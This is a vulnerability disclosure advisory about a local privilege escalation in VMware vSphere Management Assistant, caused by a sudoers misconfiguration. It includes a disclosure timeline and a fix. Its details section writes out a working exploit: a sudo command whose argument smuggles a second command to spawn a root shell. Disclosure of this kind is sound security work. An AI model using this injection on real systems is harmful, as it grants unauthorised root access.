=======================================================================
Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation

Affected Software : Vmware vSphere Management Assistant (vMA)
Severity : Medium
Local/Remote : Local
Author : @drk1wi

[Summary]

Due to an error in the /etc/sudoers file it is possible to run
arbitrary shell commands within the context of root user.

[Vulnerability Details]

[vi-admin@vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash
"'raz';/bin/bash;"
35|ERROR|1|Unable to resolve hostname.
[root@vMA vi-admin]#

[Time-line]

27/04/2010 - Vendor notified
28/04/2010 - Vendor response
??? - Vendor patch release
16/05/2011 - Public disclosure

[Fix Information]

Edit the /etc/sudoers file.

Cheers,
@drk1wi